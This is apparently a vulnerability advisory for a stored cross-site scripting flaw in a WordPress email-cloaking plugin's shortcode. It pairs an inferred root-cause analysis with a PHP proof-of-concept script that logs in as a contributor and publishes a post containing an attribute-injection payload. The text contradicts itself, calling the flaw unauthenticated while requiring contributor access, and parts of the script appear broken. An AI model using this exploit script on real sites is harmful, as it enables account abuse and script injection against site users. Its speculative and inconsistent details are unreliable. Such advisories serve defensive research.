Atomic Edge analysis of CVE-2026-10091 (metadata-based): This vulnerability allows unauthenticated stored cross-site scripting (XSS) through the Email JavaScript Cloak plugin’s ’email’ shortcode. The plugin fails to sanitize user-supplied attributes in shortcodes, enabling attackers with contributor-level access to inject arbitrary JavaScript into pages. The CVSS v3.1 score of 7.2 reflects network-based exploitation without authentication, low confidentiality and integrity impact, and a scope change due to XSS propagation to other users.
Root Cause: The CWE-79 classification and description explicitly state that the plugin’s ’email’ shortcode lacks input sanitization and output escaping on user-supplied attributes. Atomic Edge research infers that the plugin likely uses WordPress’s add_shortcode() to register the ‘[email]’ shortcode, but does not apply esc_attr(), esc_html(), or wp_kses() to shortcode attribute values before rendering them in the page HTML. Without a code diff, this conclusion is based on the CWE description and common shortcode vulnerability patterns. The vulnerable parameter is probably ’email’ or a similarly named attribute within the shortcode that gets echoed directly into the page source.
Exploitation: An authenticated user with contributor-level access creates or edits a WordPress post and inserts the ‘[email]’ shortcode with a malicious XSS payload. The shortcode syntax is likely ‘[email email=”alert(1)”]’ or ‘[email]payload[/email]’ depending on the plugin’s implementation. The attacker saves the post, which stores the unsanitized payload in the WordPress database. When any user views the compromised page, the embedded script executes. The attack does not require a nonce because shortcode processing occurs during post rendering, not via an AJAX or REST endpoint. The CVSS vector’s PR:N (privileges required: none) indicates that the attack can be carried out by any authenticated user, regardless of their role, as long as they have contributor-level access or higher.
Remediation: The plugin must escape all shortcode attributes before outputting them in the page HTML. Developers should apply WordPress escaping functions appropriate to the context: esc_attr() for HTML attribute values, esc_html() for text content inside HTML tags, or wp_kses() for allowing a safe subset of HTML tags. The fix requires updating the shortcode handler function to sanitize user input using wp_kses() or similar and escape output using the correct WordPress escaping function. Since no patched version exists, site administrators should remove or replace the plugin until a fix is available.
Impact: Successful exploitation allows attackers to inject arbitrary JavaScript into WordPress pages. This can lead to session hijacking, cookie theft, redirection to malicious sites, defacement, or phishing attacks. The stored XSS executes in the browser of every user who visits the compromised page, potentially affecting site administrators and visitors alike. An attacker could use this to create rogue admin users, modify site content, or steal sensitive data. The scope change in the CVSS vector indicates that the vulnerable component is different from the impacted resources (plugin shortcode impacts the entire site and its users).
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10091 - Email JavaScript Cloak <= 1.03 - Unauthenticated Stored Cross-Site Scripting
// Configuration
$target_url = 'http://example.com'; // Change to the target WordPress site URL
$username = 'contributor'; // WordPress username with contributor-level access
$password = 'password'; // Password for the contributor account
// Payload: XSS via shortcode attribute
$xss_payload = '" onmouseover="alert(1)"'; // Classic XSS in attribute context
$shortcode = '[email email="' . $xss_payload . '"]';
// Step 1: Authenticate as contributor
$login_url = $target_url . '/wp-login.php';
$login_data = array(
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
curl_close($ch);
// Step 2: Get a nonce for post creation and obtain _wpnonce
$admin_url = $target_url . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$admin_page = curl_exec($ch);
curl_close($ch);
// Extract wpnonce from the admin page (regex for simplicity)
preg_match('/<input type="hidden" id="_wpnonce" name="_wpnonce" value="([a-f0-9]+)"/>/', $admin_page, $matches);
$nonce = $matches[1] ?? ''; // If nonce not found, script may still work with other setup
// Step 3: Create a new post containing the malicious shortcode
$post_data = array(
'post_title' => 'CVE-2026-10091 PoC',
'post_content' => $shortcode,
'post_status' => 'publish',
'post_author' => 1, // Assuming contributor ID, adjust if needed
'content' => $shortcode, // Some plugins use 'content' key
'_wpnonce' => $nonce,
'action' => 'post',
'post_type' => 'post'
);
$post_url = $target_url . '/wp-admin/post.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array_merge($post_data, array('action' => 'editpost'))));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$post_response = curl_exec($ch);
curl_close($ch);
// Step 4: Verify the post is public and contains the payload
// Alternatively, directly navigate to the post and check for script execution
$post_url_published = $target_url . '/?p='; // If post ID known, append ID
// For simplicity, just output the payload and instructions
echo "[+] XSS payload injected. Post created with shortcode: " . $shortcode . "n";
echo "[+] Visit the newly created post to trigger the XSS.n";
echo "[+] Example: " . $target_url . "/?p=1234 (replace 1234 with actual post ID)n";
// Clean up
unlink('/tmp/cookies.txt');
?>
